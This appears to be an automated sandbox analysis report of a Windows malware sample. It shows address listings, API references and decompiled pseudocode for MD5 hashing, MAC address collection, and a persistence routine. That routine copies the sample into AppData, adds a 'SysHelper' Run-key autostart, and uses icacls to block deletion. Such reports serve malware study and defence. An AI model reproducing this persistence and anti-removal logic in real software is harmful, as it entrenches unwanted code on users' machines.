0x00000000
0x0040ff93
0x0040ff93
0x00000000
0x0040ff93
0x0040ff15
0x00000000
0x0040ff15
0x0040fede
0x0040fe00
0x0040fe05
0x0040fe08
0x0040fe15
0x0040fe19
0x0040fe20
0x0040fe2a
0x0040fe34
0x0040fe3b
0x0040fe44
0x0040fe4f
0x0040fe5e
0x0040fe65
0x0040fe71
0x0040fe79
0x0040fe7e
0x0040fe7e
0x0040fe83
0x0040fe8e
0x0040fe98
0x0040fea2
0x0040fea9
0x0040feb5
0x0040feba
0x0040feba
0x00000000
0x0040fea9
0x0040fdbd
0x0040fdc1
0x0040fdc5
0x00000000
0x00000000
0x0040fdc7
0x0040fdca
0x0040fdd0
0x00000000
0x00000000
0x00000000
0x0040fdd0
0x0040fdd6
0x0040fdd8
0x00000000
0x0040fdd8
0x0040fd7d
0x0040fd81
0x0040fd85
0x00000000
0x00000000
0x0040fd87
0x0040fd8a
0x0040fd90
0x00000000
0x00000000
0x00000000
0x0040fd90
0x0040fd96
0x0040fd98
0x00000000
0x00410052
0x0041005a
0x00410060
0x00410063
0x0041006c
0x00000000
0x0041006c
0x0040fd4c
0x0040fb31
0x0040fb36
0x0040fb38
0x0040fb3a
0x0040fb41
0x0040fb49
0x0040fb50
0x0040fb55
0x0040fb5a
0x0040fb5f
0x00000000
0x00000000
0x0040fb65
0x0040fb70
0x0040fb81
0x0040fb86
0x0040fb8a
0x0040fb8c
0x0040fb8f
0x0040fb94
0x0040fbbb
0x0040fbbb
0x0040fbc0
0x0040fbc5
0x0040fbcf
0x0040fbd1
0x0040fbd1
0x0040fbd5
0x0040fbdb
0x0040fbe0
0x0040fbed
0x0040fbf5
0x0040fbf9
0x0040fc02
0x0040fc07
0x0040fc0c
0x0040fc0c
0x0040fc0f
0x0040fc14
0x0040fc1b
0x0040fc22
0x0040fc29
0x0040fc4c
0x0040fc2b
0x0040fc2e
0x0040fc2f
0x0040fc3c
0x0040fc41
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc5b
0x0040fc60
0x0040fc63
0x0040fc6b
0x0040fc72
0x0040fc77
0x0040fc7d
0x0040fc84
0x0040fc86
0x0040fc88
0x0040fc88
0x0040fc8c
0x0040fc99
0x0040fc9f
0x0040fca1
0x0040fca1
0x0040fca5
0x0040fcab
0x0040fcb0
0x0040fcb2
0x0040fcb4
0x0040fcbb
0x0040fcc3
0x0040fcca
0x0040fcd1
0x0040fcd7
0x0040fcdc
0x0040fcdc
0x0040fcdf
0x0040fce5
0x0040fce8
0x0040fced
0x0040fced
0x00000000
0x0040fce5
0x0040fba0
0x0040fba7
0x0040fbaf
0x0040fbb3
0x0040fbb4
0x0040fbb7
0x00000000
0x0040fba0
0x0040f789
0x0040f789
0x0040f790
0x0040f792
0x0040f799
0x0040f79c
0x0040f7a6
0x0040f7ae
0x0040f7b3
0x0040f7bc
0x0040f7bf
0x0040f7ca
0x0040f7d2
0x0040f7d9
0x0040f7de
0x0040f7e2
0x0040f7e8
0x0040f870
0x0040f874
0x0040f879
0x0040f87e
0x0040f87e
0x0040f883
0x0040f88a
0x0040f891
0x0040f898
0x0040f89c
0x0040f8a1
0x0040f8a6
0x0040f8a6
0x00000000
0x0040f89c
0x0040f7ee
0x0040f7f4
0x00000000
0x0040f7f6
0x0040f7fd
0x0040f807
0x0040f809
0x0040f813
0x0040f818
0x0040f818
0x0040f821
0x0040f827
0x0040f830
0x0040f832
0x0040f83c
0x0040f844
0x0040f844
0x0040f850
0x0040f858
0x0040f85d
0x0040f862
0x0040f867
0x0040f92b
0x0040f930
0x0040f935
0x0040f935
0x0040f938
0x0040f93a
0x0040f945
0x0040f94c
0x0040f950
0x0040f959
0x0040f95e
0x0040f95e
0x004100ea
0x004100ee
0x004100f3
0x004100f8
0x00410100
0x0041010b
0x0040f86d
0x0040f86d
0x00000000
0x0040f86d
0x0040f867
0x0040f8a9
0x0040f8a9
0x0040f8aa
0x0040f8ad
0x00000000
0x0040f790

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32 ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32 ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: f6badace697354d2f2ae020dc44692156df4807d3ab43a835b81db04197c4041
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: f6badace697354d2f2ae020dc44692156df4807d3ab43a835b81db04197c4041
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0040E870(void* __ecx, void* __eflags, char _a4, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t48;
				int* _t49;
				char _t51;
				char _t53;
				char _t59;
				intOrPtr _t67;
				void* _t82;
				void* _t83;
				intOrPtr* _t89;
				void* _t94;
				void* _t95;
				int _t96;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t105;

				 *[fs:0x0] = _t102;
				_t103 = _t102 - 0x38;
				_v20 = _t103;
				_t83 = __ecx;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E004156D0(__ecx, __ecx, _t95, 0x4ffca4);
				_t48 =  &_v32;
				_v8 = 1;
				__imp__CryptAcquireContextW(_t48, 0, 0, 1, 0xf0000000, 0, _t95, _t98, _t82,  *[fs:0x0], 0x4ca9e8, 0xffffffff); // executed
				if(_t48 == 0) {
					_v40 = _t48;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t49 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t49);
				if(_t49 == 0) {
					_v44 = _t49;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t51 =  >=  ? _a4 :  &_a4;
				__imp__CryptHashData(_v24, _t51, _a20, 0);
				if(_t51 == 0) {
					_v48 = _t51;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t99 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t53 =  *_t99(_v24, 2, 0,  &_v28, 0);
				_t113 = _t53;
				if(_t53 == 0) {
					_v52 = _t53;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t96 = E00420BE4(_t83, _t95, _t113, _v28 + 1);
				_v36 = _t96;
				E0042B420(_t96, 0, _v28 + 1);
				_t105 = _t103 + 0x10;
				_t59 =  *_t99(_v24, 2, _t96,  &_v28, 0);
				if(_t59 == 0) {
					_v56 = _t59;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t100 = 0;
				while(_t100 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t100 + _t96) & 0x000000ff);
					_t105 = _t105 + 0xc;
					if(_v72 != 0) {
						_t89 =  &_v72;
						_t39 = _t89 + 1; // 0x1
						_t94 = _t39;
						do {
							_t67 =  *_t89;
							_t89 = _t89 + 1;
							__eflags = _t67;
						} while (_t67 != 0);
						_push(_t89 - _t94);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					} else {
						_push(0);
						E00413EA0(_t83, _t83, _t96, _t100,  &_v72);
						_t100 = _t100 + 1;
					}
					L20:
				}
				E00422110(_t96);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				__eflags = _a24 - 0x10;
				if(_a24 >= 0x10) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return 1;
				goto L20;
			}

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 0020aaaefdb6c4dcb4bf3e2ceb4008ce88efa9caebdce230c40b083e7cee562a
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], E004CAA00, 0xffffffff); // executed
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 3c969f350820ba706d19a7227015f75167d650bfbf9457a4931adb697a62dd31
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14); // executed
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15); // executed
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n"); // executed
							E00421F2D(_t33, _t37, _t41, __eflags); // executed
							_push("\n"); // executed
							E00421F2D(_t33, _t37, _t41, __eflags); // executed
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00620000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 86116fd0c9e432b104d34220e70c2ad806a44289ccaa01368c67fdd59d26a7a7
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 86116fd0c9e432b104d34220e70c2ad806a44289ccaa01368c67fdd59d26a7a7
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v16;
				WCHAR* _v24;
				void* _v28;
				void* _v32;
				int _v36;
				intOrPtr _v40;
				WCHAR* _v44;
				char _v60;
				int _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				char _v88;
				int _v92;
				intOrPtr _v96;
				WCHAR* _v100;
				char _v116;
				intOrPtr _v120;
				char _v140;
				struct _PROCESS_INFORMATION _v156;
				char _v172;
				struct _STARTUPINFOW _v248;
				short _v2296;
				char _v4342;
				short _v4344;
				char _v6390;
				char _v6392;
				short _v8440;
				short _v12536;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t124;
				intOrPtr _t133;
				_Unknown_base(*)()* _t137;
				short _t150;
				intOrPtr _t160;
				long _t171;
				intOrPtr _t207;
				void* _t213;
				void* _t221;
				intOrPtr* _t223;
				signed int _t225;
				WCHAR* _t228;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t234;
				intOrPtr* _t237;
				signed int _t239;
				intOrPtr _t242;
				void* _t245;
				WCHAR* _t246;
				void* _t247;
				void* _t248;
				void* _t250;
				void* _t253;
				void* _t257;
				intOrPtr _t263;
				void* _t264;
				void* _t266;

				_t221 = __ebx;
				_push(0xffffffff);
				_push(0x4cac68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t263;
				E0042F7C0(0x30e8);
				_push(_t253);
				_v32 = 0;
				_t250 = __edx; // executed
				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
				if(_t124 != 0) {
					L50:
					 *[fs:0x0] = _v16;
					return _t124;
				}
				_v6392 = _t124;
				_v36 = 1;
				E0042B420( &_v6390, _t124, 0x7fe);
				_t264 = _t263 + 0xc;
				_v64 = 0x400;
				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
				RegCloseKey(_v32);
				_v40 = 7;
				_v44 = 0;
				_v60 = 0;
				if(_v6392 != 0) {
					_t223 =  &_v6392;
					_t245 = _t223 + 2;
					do {
						_t133 =  *_t223;
						_t223 = _t223 + 2;
					} while (_t133 != 0);
					_t225 = _t223 - _t245 >> 1;
					L6:
					_push(_t225);
					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
					_v8 = 0;
					_t255 = _v44;
					if(_v44 == 0) {
						L19:
						_v8 = 0xffffffff;
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
						_t256 = _t137;
						_v92 = 0;
						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
						_v36 = PathFindFileNameW( &_v8440);
						 *_t137(0, 0x1c, 0, 0,  &_v2296);
						__imp__UuidCreate( &_v172);
						_v24 = 0;
						__imp__UuidToStringW( &_v172,  &_v24);
						_t246 = _v24;
						_v96 = 7;
						_v100 = 0;
						_v116 = 0;
						if( *_t246 != 0) {
							_t228 = _t246;
							_t57 =  &(_t228[1]); // 0x2
							_t256 = _t57;
							do {
								_t150 =  *_t228;
								_t228 =  &(_t228[1]);
							} while (_t150 != 0);
							_t230 = _t228 - _t256 >> 1;
							goto L26;
						} else {
							_t230 = 0;
							L26:
							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
							_v8 = 1;
							__imp__RpcStringFreeW( &_v24, _t230);
							_t257 = PathAppendW;
							_t154 =  >=  ? _v116 :  &_v116;
							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
							CreateDirectoryW( &_v2296, 0);
							if(_t250 == 0) {
								L33:
								_v68 = 7;
								_v72 = 0;
								_v88 = 0;
								if(_v2296 != 0) {
									_t232 =  &_v2296;
									_t247 = _t232 + 2;
									do {
										_t160 =  *_t232;
										_t232 = _t232 + 2;
									} while (_t160 != 0);
									_t234 = _t232 - _t247 >> 1;
									L38:
									_push(_t234);
									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
									_v8 = 2;
									PathAppendW( &_v2296, _v36);
									DeleteFileW( &_v2296);
									CopyFileW( &_v8440,  &_v2296, 0);
									_v28 = 0;
									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28);
									if(_t171 != 0) {
										L45:
										if(_v68 >= 8) {
											L00422587(_v88);
											_t264 = _t264 + 4;
										}
										_t124 = 0;
										_v68 = 7;
										_v72 = 0;
										_v88 = 0;
										if(_v96 >= 8) {
											_push(_v116);
											L49:
											_t124 = L00422587();
										}
										goto L50;
									}
									_v4344 = _t171;
									E0042B420( &_v4342, _t171, 0x7fe);
									_t266 = _t264 + 0xc;
									lstrcpyW( &_v4344, "\"");
									lstrcatW( &_v4344,  &_v2296);
									lstrcatW( &_v4344, L"\" --AutoStart");
									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183);
									RegCloseKey(_v28);
									_t236 = _a4;
									if(_a4 != 0) {
										E00413260(_t236, lstrcpyW,  &_v2296);
									}
									E0042B420( &_v248, 0, 0x44);
									_t264 = _t266 + 0xc;
									_v248.cb = 0x44;
									_v248.dwFlags = 1;
									_v248.wShowWindow = 0;
									SetLastError(0);
									lstrcpyW( &_v12536, L"icacls \"");
									_t194 =  >=  ? _v88 :  &_v88;
									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
									if(CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156) != 0) {
										do {
										} while (WaitForSingleObject(_v156, 1) == 0x102);
									} else {
										GetLastError();
									}
									goto L45;
								}
								_t234 = 0;
								goto L38;
							}
							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60); // executed
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_t124 = E00414690(_t221, _t242, _t124, 0);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
